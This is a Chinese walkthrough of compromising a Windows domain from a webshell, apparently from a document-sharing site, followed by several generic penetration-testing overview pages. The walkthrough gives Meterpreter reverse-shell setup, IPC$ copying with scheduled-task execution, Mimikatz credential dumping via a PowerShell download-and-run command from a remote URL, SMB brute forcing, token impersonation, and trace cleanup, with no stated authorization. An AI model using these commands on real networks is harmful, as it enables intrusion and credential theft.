new_域渗透测试教程

合集下载

渗透测试基础教程第1章课件

渗透测试基础教程第1章课件

小结
渗透测试的定义 渗透测试分类 渗透测试的流程
主要内容
网络安全概述 渗透测试的定义和分类 渗透测试的流程
2024/3/14
渗透测试基础教程
网络安全概述
❖ 保密性——指信息不泄露给非授权用户、实体 或过程,或供其利用的特性。
❖ 完整性——值数据未授权不能进行改变的特性, 即信息在存储或传输过程中保持不被修改、不 被破坏和丢失的特性。
❖ 可用性——指可被授权实体访问并按需求使用 的特性,即当需要时应能存取所需的信息。
渗透测试的流程
❖前期交互阶段
▪ 在前期交互阶段,渗透测试团队与客户进行 交互讨论,最重要的是确定渗透测试的范围、 目标、限制条件及服务合同的细节。
▪ 该阶段通常涉及收集客户需求、准备测试计 划、定义测试范围与边界、定义业务目标、 项目管理与规划等活动。
2024/3/14
渗透测试基础教程
渗透测试的流程
❖情报收集阶段
2024/3/14
渗透测试基础教程
渗透测试的流程
❖威胁建模阶段
2024/3/14
渗透测试基础教程
渗透测试的流程
❖漏洞分析阶段
2024/3/14
渗透测试基础教程
渗透测试的流程
❖渗透攻击阶段
2024/3/14
渗透测试基础教程
渗透测试的流程
❖报告阶段
2024/3/14
渗透测试基础教程
❖ 可控性——指对信息的传播及内容具有控制能 力
❖ 可审查性——指出现安全问题时可提供依据与 手段的特性。
2024/3/14
渗透测试基础教程
渗透测试的定义和分试 ▪ 灰盒测试
2024/3/14
渗透测试基础教程

渗透测试指南

渗透测试指南

渗透测试指南渗透测试,也被称为漏洞评估或信息安全审计,是一种模拟实际黑客攻击的过程,用于评估系统的安全性和弱点。

渗透测试是信息安全领域非常重要的一部分,可以帮助组织发现并修复系统中的安全漏洞,保护敏感信息和保证业务连续性。

以下是渗透测试的一般步骤和指南。

1.确定目标和范围:在进行渗透测试之前,需要明确测试的目标和范围。

根据组织的需求和要求,确定要测试的系统和网络,并确定测试的时间和资源限制。

2.收集信息:收集目标系统的信息是渗透测试的第一步。

这包括IP地址、域名、网络拓扑、服务和应用程序等。

通过使用网络扫描工具和手动,获取尽可能多的信息。

3. 识别漏洞:在收集信息的基础上,使用漏洞扫描工具来检测系统中的安全漏洞。

扫描可以包括网络扫描、Web应用程序扫描、主机扫描等。

通过对扫描结果的分析,确定系统中的漏洞和弱点。

4.漏洞利用:在识别了系统中的漏洞之后,渗透测试人员可以尝试利用这些漏洞来获取系统权限或访问敏感信息。

这一步骤需要谨慎行事,避免对系统造成任何损害。

5.提供报告和建议:在完成渗透测试后,渗透测试人员应该提供详细的测试报告。

报告应该包括发现的漏洞、攻击路径、危害程度和建议的修复措施。

这些建议应该针对不同的漏洞和系统特点而定,以帮助组织修复漏洞并提高系统的安全性。

除了以上的一般步骤,下面是一些渗透测试的最佳实践和指南:1.合法性和授权:在进行渗透测试之前,确保您有所有必要的授权和合法性。

渗透测试只能在受控环境中进行,未经授权的渗透测试是非法的。

2.数据保护:在进行渗透测试期间,渗透测试人员可能会接触到敏感信息。

确保在任何时候都要保护这些信息的机密性和完整性,并遵守隐私和数据保护法规。

3.与组织沟通:在进行渗透测试之前,与组织的管理层和相关业务部门进行充分的沟通。

确保他们了解测试的目的、范围和可能的风险。

4.保持技术更新:渗透测试是一个不断发展和变化的领域。

渗透测试人员应该不断学习和掌握新的技术和漏洞。

渗透测试入门pdf

渗透测试入门pdf

渗透测试入门pdf摘要:I.渗透测试概述- 渗透测试定义- 渗透测试的目的和作用II.渗透测试的基本流程- 信息收集- 漏洞扫描- 漏洞利用- 权限提升- 维持访问III.渗透测试的工具和技术- 常见渗透测试工具介绍- 渗透测试技术概述IV.渗透测试的实践与案例- 实践渗透测试的步骤- 渗透测试案例分析V.渗透测试的伦理和法律问题- 渗透测试的道德准则- 渗透测试的法律规定正文:渗透测试是一种通过模拟攻击者的行为,对目标系统进行安全漏洞检测和评估的技术。

它可以帮助企业和个人发现潜在的安全隐患,提高安全防范能力。

本文将介绍渗透测试的基本概念、流程、工具和技术,以及实践和案例,最后探讨渗透测试的伦理和法律问题。

渗透测试主要包括以下五个阶段:1.信息收集:在渗透测试的初期阶段,渗透测试人员需要收集目标系统的各种信息,如IP 地址、开放端口、运行的服务等,为后续的攻击提供基础数据。

2.漏洞扫描:利用扫描工具(如Nmap、Metasploit 等)对目标系统进行漏洞扫描,发现可能存在的安全漏洞。

3.漏洞利用:根据扫描结果,渗透测试人员选择合适的漏洞利用技术(如SQL 注入、跨站脚本等)对目标系统进行攻击,获取系统的访问权限。

4.权限提升:在成功渗透目标系统后,渗透测试人员需要进一步获取更高的权限,以便更深入地了解目标系统的安全状况。

5.维持访问:渗透测试人员需要确保在完成渗透测试后,能够持续地访问目标系统,以便对系统进行持续的安全监控。

渗透测试中常用的工具和技术包括:- 扫描工具:如Nmap、Metasploit、Wireshark 等,用于发现目标系统的漏洞和弱点。

- 攻击技术:如SQL 注入、跨站脚本、社会工程等,用于突破目标系统的安全防护。

在实践渗透测试时,需要遵循以下步骤:1.确定测试目标:明确渗透测试的目的和范围。

2.获取授权:征得目标系统的所有者同意,确保渗透测试合法合规。

3.信息收集:搜集目标系统的各种信息。

渗透测试方案讲解

渗透测试方案讲解

渗透测试方案讲解渗透测试是指通过模拟黑客攻击的方式,来评估信息系统的安全性和漏洞,并提供改进建议的过程。

渗透测试方案是进行渗透测试的详细计划和流程。

下面是一个渗透测试方案的讲解,包括准备工作、测试流程、目标确定、漏洞扫描、攻击和渗透、报告撰写等几个关键步骤。

一、准备工作在进行渗透测试之前,需要进行一些必要的准备工作。

首先,需要明确测试目标,明确测试的范围和目标系统、应用或网络。

其次,需要获得授权,确保测试合法合规,并与系统管理员或信息安全团队进行沟通和协调。

然后,需要建立测试环境,搭建实验室或虚拟环境,以便进行安全测试,同时确保不会对目标系统产生任何负面影响。

最后,需要准备测试工具和资源,如渗透测试工具、虚拟机、实验数据等。

二、目标确定在进行渗透测试时,需要明确测试的目标,即明确要测试的系统、应用或网络。

目标确定的过程中,需要进行信息收集,获取尽可能多的关于目标的信息,如IP地址、域名、网络拓扑等。

还需要分析目标系统的特点,了解其应用和运行环境,以便制定更有针对性的测试策略。

三、漏洞扫描漏洞扫描是渗透测试的关键步骤之一,通过使用漏洞扫描工具,对目标系统进行全面扫描,找出可能存在的漏洞和安全风险。

漏洞扫描需要依据目标系统和应用的特点,选择合适的漏洞扫描工具,并根据扫描结果进行进一步的分析和评估。

四、攻击和渗透攻击和渗透是模拟黑客攻击的过程,通过使用各种攻击手段和技术,尝试入侵到目标系统中。

在进行攻击和渗透时,需要使用一些渗透测试工具,如Metasploit、Nessus等,利用已知的漏洞和安全弱点进行攻击,并尝试获取非法访问权限或敏感信息。

对于未知的漏洞和安全风险,需要进行进一步的研究和分析,以便提供更准确的测试结果和建议。

五、报告撰写在完成攻击和渗透的过程后,需要对测试结果进行分析和总结,并撰写渗透测试报告。

渗透测试报告应包含测试的过程、目标系统的安全风险和漏洞、测试结果的影响评估、改进建议等内容。

渗透测试完全初学者指南

渗透测试完全初学者指南

渗透测试完全初学者指南1. 引言1.1 概述渗透测试是一种授权的技术,用于评估和确保计算机系统、网络或应用程序的安全性。

它模拟了真实世界中恶意攻击者可能采取的行动,以揭示潜在的漏洞和薄弱点。

随着网络攻击日益频繁和复杂化,进行渗透测试变得越来越重要。

1.2 文章结构本文旨在提供给完全初学者一个全面且易于理解的渗透测试指南。

该指南将按照如下结构进行说明:引言部分将介绍渗透测试的定义、背景和重要性;渗透测试基础知识部分将包括渗透测试步骤、常用工具和技术;渗透测试准备工作部分将探讨如何寻找目标信息、搭建环境及法律与道德问题;渗透测试主要阶段及技巧部分将详细介绍侦查阶段、漏洞扫描与评估阶段以及社会工程学攻击技巧;最后,结论与进一步学习建议部分总结了渗透测试的重要性和挑战性,并提供了个人发展和深入学习的路径,以及相关资源和组织的建议。

1.3 目的本文的目的是为那些对渗透测试感兴趣但完全没有经验的初学者提供一个逐步引导的指南。

通过阅读本文,读者将了解渗透测试的基础知识、主要步骤和必备技能。

此外,本文还将强调渗透测试中合法和道德问题,并给予相应的引导和建议。

最终,读者将有能力开始自己进行简单的渗透测试并进一步探索这个领域。

以上为“1. 引言”部分内容。

希望对您撰写长文有所帮助!如需进一步协助,请随时告知。

2. 渗透测试基础知识2.1 定义和背景:渗透测试(Penetration Testing),也被称为白盒测试或伦理黑客,是一种评估计算机系统、网络或应用程序的安全性的方法。

其目标是模拟攻击者的行为,以发现系统中可能存在的漏洞和弱点。

渗透测试利用各种技术和工具来主动探测、分析并验证目标系统可能存在的漏洞,从而帮助组织识别并解决这些问题。

2.2 渗透测试步骤:渗透测试通常包含以下几个主要步骤:1. 侦查:收集目标信息,包括域名、IP地址、网络拓扑等。

2. 端口扫描与服务识别:通过扫描目标系统的端口,确定哪些端口处于开放状态并确定运行在各个端口上的服务。

渗透测试完全初学者指南 pdf

渗透测试完全初学者指南 pdf

渗透测试完全初学者指南pdf摘要:1.渗透测试概述2.渗透测试的目的和意义3.渗透测试的基本流程4.渗透测试所需工具及其使用5.渗透测试实践技巧与注意事项6.渗透测试的未来发展趋势正文:一、渗透测试概述渗透测试是一种模拟攻击者对目标系统进行安全攻击的测试方法,旨在发现系统中的安全漏洞,以便及时进行修复。

渗透测试通常由专业的安全测试人员执行,他们使用各种工具和技术来模拟真实的攻击场景,以评估系统的安全性。

二、渗透测试的目的和意义渗透测试的主要目的是发现系统中的安全漏洞,以便进行修复。

这有助于提高系统的安全性,防止恶意攻击者利用漏洞进行攻击,从而保护企业和用户的数据和信息安全。

三、渗透测试的基本流程渗透测试的基本流程通常包括以下几个步骤:1.信息收集:收集目标系统的相关信息,如IP 地址、端口、操作系统、服务等。

2.漏洞扫描:使用扫描工具对目标系统进行漏洞扫描,发现可能存在的安全漏洞。

3.漏洞验证:通过各种技术手段对扫描到的漏洞进行验证,以确定是否存在真正的安全漏洞。

4.漏洞利用:利用已知的漏洞或构建特定的攻击场景,对目标系统进行攻击,以评估系统的安全性。

5.报告和修复:将测试结果整理成报告,提供给系统管理员或开发人员进行修复。

四、渗透测试所需工具及其使用渗透测试需要使用各种工具来模拟攻击场景,发现安全漏洞。

常用的渗透测试工具包括Metasploit、Nmap、Wireshark 等。

Metasploit 是一款强大的渗透测试工具,可以帮助测试人员进行网络渗透测试和安全漏洞研究分析。

Nmap 是一款用于网络探测和安全审计的工具,可扫描目标系统的开放端口、操作系统、服务等信息。

Wireshark 是一款网络协议分析器,可用于捕获和分析网络数据包,发现潜在的安全问题。

五、渗透测试实践技巧与注意事项进行渗透测试时,需要注意以下几点:1.遵守道德规范和法律法规,不得进行未经授权的渗透测试。

2.测试过程中,应确保不会对目标系统造成损害或破坏。

渗透检测原理及操作方法

渗透检测原理及操作方法

渗透检测原理及操作方法渗透测试(Penetration Testing)是一种通过模拟攻击来评估系统安全性的方法。

渗透测试可以帮助组织发现并修复安全漏洞,加强网络和系统的安全性。

接下来,我们将详细介绍渗透测试的原理及一般操作方法。

渗透测试的原理:1.信息收集:在渗透测试开始之前,需要收集目标系统的相关信息,包括网络拓扑、IP地址、操作系统和服务信息等。

这些信息可以通过网络扫描和网络侦查等方式获取,用来确定潜在的攻击面和薄弱点。

2.漏洞识别:在信息收集的基础上,渗透测试人员会使用漏洞扫描工具,对目标系统进行主动扫描,以识别系统中存在的安全漏洞。

漏洞扫描可以发现包括操作系统漏洞、应用程序漏洞、配置错误等在内的各种漏洞。

3.验证与攻击:一旦发现了安全漏洞,渗透测试人员会尝试利用这些漏洞进行攻击,并验证攻击的可行性和影响范围。

常见的攻击手段包括弱口令猜测、SQL注入、跨站脚本(XSS)等。

4.权限提升:一旦成功进入目标系统,渗透测试人员会尝试获取更高的权限,以获取更敏感的信息或对系统进行更深层次的访问和控制。

5.数据获取与控制:渗透测试人员会尝试获取目标系统中的敏感数据,例如用户信息、密码、数据库等。

他们还可以修改或删除系统上的文件、配置或利用漏洞实现远程访问和控制等。

渗透测试的操作方法:1. 信息收集:使用工具如Nmap、Shodan、DNS枚举等,收集目标系统的基本信息,如IP地址、域名、子域名、主机系统等。

2. 漏洞扫描:使用漏洞扫描工具如Nessus、OpenVAS等,对目标系统进行扫描,发现潜在的漏洞。

3. 漏洞验证:根据漏洞扫描结果,选取重点漏洞进行验证。

使用Metasploit等工具,尝试利用这些漏洞进行攻击,验证其可行性。

4. 提权漏洞利用:一旦成功进入目标系统,可以尝试提升权限。

主要使用Exploit工具,如Mimikatz进行进一步攻击。

5.信息收集与控制:在系统中获取敏感信息的方法包括网络监听、嗅探、数据包分析等。

渗透试验方法

渗透试验方法

渗透试验方法渗透测试方法导言:随着信息技术的快速发展,网络安全问题日益突出。

为了保护网络环境的安全性,渗透测试成为了一种非常重要的手段。

渗透测试,即通过模拟黑客攻击的方式,评估系统和网络的安全性,发现潜在的安全漏洞,并提供相应的解决方案。

本文将介绍常用的渗透测试方法。

一、信息收集信息收集是渗透测试的第一步,通过收集目标系统的相关信息,为后续的攻击和测试做准备。

信息收集可以通过多种方式进行,包括网络扫描、WHOIS查询、DNS查询、搜索引擎查询等。

1. 网络扫描:使用扫描工具对目标网络进行扫描,发现主机、开放端口和服务等信息。

常用的扫描工具有Nmap、Zmap等。

2. WHOIS查询:通过WHOIS查询工具查询目标域名的注册信息,获取域名持有者、联系方式等信息。

3. DNS查询:通过DNS查询工具查询目标域名的DNS记录,获取域名指向的IP地址等信息。

4. 搜索引擎查询:通过搜索引擎搜索目标系统的相关信息,如网站结构、子域名、敏感信息等。

二、漏洞扫描漏洞扫描是渗透测试的核心环节,通过扫描目标系统的漏洞,发现存在的安全风险。

漏洞扫描可以分为主动扫描和被动扫描两种方式。

1. 主动扫描:主动扫描是指通过扫描工具主动对目标系统进行漏洞扫描。

扫描工具根据已知漏洞的特征,对目标系统进行攻击模拟,以发现可能存在的漏洞。

常用的漏洞扫描工具有Nessus、OpenVAS等。

2. 被动扫描:被动扫描是指通过对目标系统的监听和分析,发现系统中存在的漏洞。

被动扫描可以通过网络抓包、日志分析等方式进行。

常用的被动扫描工具有Wireshark、Snort等。

三、漏洞利用漏洞利用是指通过已知的漏洞对目标系统进行攻击,获取系统权限或者执行特定的操作。

漏洞利用需要渗透测试人员具备一定的攻击技术和经验。

1. 密码破解:通过暴力破解或者使用密码字典等方式,破解目标系统的登录密码,获取系统权限。

2. 缓冲区溢出:利用目标系统存在的缓冲区溢出漏洞,向系统注入恶意代码,并执行特定的操作。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

域渗透测试教程(windows server2012)乌云ID:大山的放羊娃域渗透测试教程(windows server2012) (1)前言 (2)第一步反弹meterpreter (2)第二步尝试提权windows server2012 (4)第三步尝试当前账号Bypassuac测试 (5)第四步相关信息收集 (6)第五步信息分析,成功获取一台服务器权限 (8)第六步域信息收集 (10)第七步SMB快速扩张控制权限 (16)第八步Poershell获取域控管理员在线的机器 (18)第九步域控管理员权限的获取(windows2012权限) (20)第十步域控我来了(msf psexec反弹shell) (22)第十一步Meterpreter获取所有用户的hash (24)第十二步曲折的探索之路 (25)第十三步我轻轻的来了,我又轻轻的走了,管理员,再见(清理) (26)总结 (27)前言内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里。

于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴求。

今天小菜我本着所有师傅们无私分享的精神,特将三年内求师傅,求妹子,求神器所得,经过整理后,关键的知识点写出来。

相关知识点总结如下:●免杀payload的生成,请使用Veil●msf在meterpreter下的提权尝试●msf在meterpreter下的bypassuac尝试●内网渗透测试过程中的信息关联●meterpreter的路由添加以及相关扫描●Powershell在meterpreter下面的使用●Meterpreter的post模块使用●Msf的custom自己生成的payload的使用●进程注入窃取令牌其实重点不在于知识的多少,大家只需关注比较重点的连接点。

分享为了方便大家以后一起交流,一起学习,一起进步。

首先shell是别人给我的,也不是这里介绍的重点,所以在此忽略。

渗透测试的环境详细如下:A堡垒机(webshell所在机器):windows server2012B堡垒机:windows2008(powershell扫描机器)C堡垒机:有域管理进程的机器windows server2012D堡垒机若干第一步反弹meterpreter其实每一次的渗透测试开始并不像我们想象的那么顺利,而这一次的开始也同样意味着我们一次不同的旅程,整个的渗透测试过程我花了差不多四个小时的时间,大部分的时间都是花在解决这些问题之上。

1webshell无法上传exe本来想着直接上传meterpreter的payload的直接反弹的结果发现上传不了,可以选择powershell的meterpreter的模块来实现2meterpreter的reverse_tcp模块反弹不成功Msf的payload的反弹,刚开始我使用的模块是meterpreter的reverse_tcp的模块来尝试,发现可以反弹,但是一直无法建立成功meterpreter,说明一定有监控发现了我们的行为。

于是在此基础上尝试meterpreter的reverse_https模块,顺利反弹成功详细遇到的问题和解决过程的图如下所示:图1-1使用payload图1-2设置https的payload图1-3反弹成功第二步尝试提权windows server2012当我们首先拿到一个Webshell的时候想到的第一件事是什么?那肯定是提权,我也想大家想的一样,首先开始了我们的提权之旅。

首先使用msf的search模块ms15,会得到一些漏洞利用的模块。

我尝试了ms15_05以及ms15_078全部以失败结束。

详细的图如下所示:图2-1提权尝试失败第三步尝试当前账号Bypassuac测试刚开始一直忘说了一件事,那就是webshell本身的权限,我们目前webshell 是jsp的,具有当前的一个普通域用户的权限。

我于是也想到了是不是可以通过bypassuac来完成提权呢,但是测试的结果可想而知,又一次失败了。

目前详细的情况如下:图3-1当前的用户权限图3-2bypassuac尝试第四步相关信息收集当我们此时提权不成功的情况下,我们还是可以利用当前的用户进行域渗透测试的。

那么目前我们具有以下几种方式进行渗透测试域:1收集域里面的相关信息,包括所有的用户,所有的电脑,以及相关关键的组的信息。

常使用到的命令如下:net user/domainNet group“domain computers”/domainnet group“domain admins”/domain#查看域管理员net localgroup administratorsnet view/domain2收集sqlserver的相关信息,如果当前堡垒机使用了sql server的话,恰巧用户是当前的域用户的话,我们在此可以使用sqlcmd的信息收集,以及扫描攻击。

在这里只是提到,因为篇幅问题,暂时不做深一层讨论根据我的渗透测试经验,我在此只是做了最简单的信息收集,首先使用sqlcmd的获取sql server的所有机器列表、当前堡垒机的机器名、当前堡垒机的IP、还有net view来做简单的信息收集。

详细的图如下所示:图4-1SQLCMD获取信息图4-2当前的机器名图4-3net view相关的机器名第五步信息分析,成功获取一台服务器权限当我们信息收集完成以后,我们要开始考虑接下来要做什么。

首先我们来看一下我们目前拥有什么:A一个域用户的进程权限,当前堡垒机是windows server2012,提权失败。

(假如能提权成功,我们依然是无法获取到用户的明文密码)B当前的堡垒机的用户名C当前sqlcmd获取到的同样安装了sql server机器的名称目前我们的思路有:1使用meterpreter的目前权限来添加路由进行弱口令扫描2使用powershell对内网进行扫描(本次渗透测试使用了,但是在这里暂时没有使用),具体来说时间比较慢一点,当然此时此刻powershell绝对算是一个内网渗透测试又一神器3使用当前的用户权限架设socks4a,然后利用第一步我们获取到的信息socks进行内网扫描4使用当前用户的权限,对域里面的电脑进行IPC,或者DIR溢出(也就是dir其他电脑的c盘,如果成功表示有权限)批量测试通过上面的分析,此时我选择了最偷懒的一种方法,进行当前堡垒机的机器名和net view的机器名进行对比,找出来非常相似的几个机器名,手动测试。

当前速度也是非常快的,在尝试了两次的时候就成功了。

详细过程如下:Net use\\ip\c$Tasklist/v/s ip图5-1net use测试成功图5-2tasklist执行成功第六步域信息收集首先在第四步已经说了域相关的信息收集,这里就不做过多的介绍了,这次是在第五步的基础上做的相关收集,相关知识点如下:1域信息收集,其中用到的命令如下:Net group“domain admins”/domainNet group/domainNet group“domain controllers”/domainNet group“enterprise admins”/domain2ipc$入侵,大家相关的话自行百度经典IPC$入侵Net use\\ip\c$Copy bat.bat\\ip\c$(其中bat.bat是powershell的meterpreter)Net time\\ipAt\\ip time c:\bat.bat3上传抓明文工具64.exe(mimikatz神器),大家都懂的Upload/home/64.exe c:\ShellCd\64.Exe4查看抓取到的用户的详细信息Net use xxx/domain5使用meterpreter的ps,查看相关用户的进程列表6尝试使用域令牌假冒Use incongnitolist_token-uImpersonate_token xxxxxx我在这次渗透测试过程中尝试上面讲到的所有知识点,详细的截图如下:图6-1查看域管图6-2查看域组图6-3查看域控制器图6-4查看企业管理组图6-5共享copy数据图6-6经典ipc$图6-7反弹meterpreter成功图6-8上传文件图6-9查看服务器信息图6-10抓取密码图6-11查看域用户权限图6-12查看域用户权限图6-13窃取令牌尝试图6-14查看主域控的IP第七步SMB快速扩张控制权限此时此刻,作为读者你的在想什么呢?是不是当看到第六步的时候就可以去睡觉了,毕竟已经凌晨五点了。

但是此时此刻作为一个专业求师傅,求妹子,求神器的人可不这么想。

我们要做最后的冲刺,因为黎明的钟声已经敲响。

先来看一下我们当前拥有什么权限:有两台堡垒机,两个用户权限目前我们要做的事情很简单,就是快速的在内网扩大控制权限,那么如何去做,其实很简单的,就是快速的扫描以完成我们的梦想。

具体如下:1使用当前获取到的两个用户权限,快速的进行扫描。

扫描哪里了,看到第六步最后一张图6-14了没,就是域控的IP段2smb_login扫描3端口转发进内网目前思路我们已经有了,神器msf终于迎来了自己梦想恶天堂。

让我们愉快的玩耍吧。

详细知识点如下:1msf添加路由route add ip mask sessionid2smb_login模块或者使用psexec_scanner(这个模块需要你自己搜索一下)3meterpreter端口转发4msf的socks4a模块(这次渗透测试没使用到,但是并不代表它不美好)图7-1设置smb_login的参数图7-2爆破成功的机器图7-3查看已经获取到的权限图7-4端口转发和目前拥有的权限第八步Poershell获取域控管理员在线的机器内网渗透测试不得不说到两大神器:msf和powershell,但是看大家基本上都是分开来使用的,或者说大家在一次渗透测试的过程中很少遇到,今天作为读者的你有福了。

首先来讲讲powershell的在内网渗透测试中不仅能扫,能爆,能转发,当然还能做更多的事情,一般使用到的模块有下面三个:1Empire据说是神器,也确实是神器,我没使用过,暂时不多说2PowerUp据说提权神器,也确实是神器,我很少使用。

也暂时不多说3PowerView据说是域渗透神器,也确实是神器,我一直用,非常漂亮来说说powershell的使用,其实也很简单,只是大家在用的过程中一般没有太多的注意,主要有三种方式来调用:1当然是下载到本地执行,详细使用方法如后面连接:powershell"IEX(New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI');Invoke-Mimikatz-DumpCreds"2第二种方式是把powershell文件上传到堡垒机本地执行,powershell.exe-exec bypass-Command"&{Import-Module.\powerview.ps1;Invoke-UserHunter}"3上传到对方本地,然后Import-Module导入,使用PowerView的所有模块使用其实很简单,直接调用方法,大家看看下面的图就知道了。

相关文档
最新文档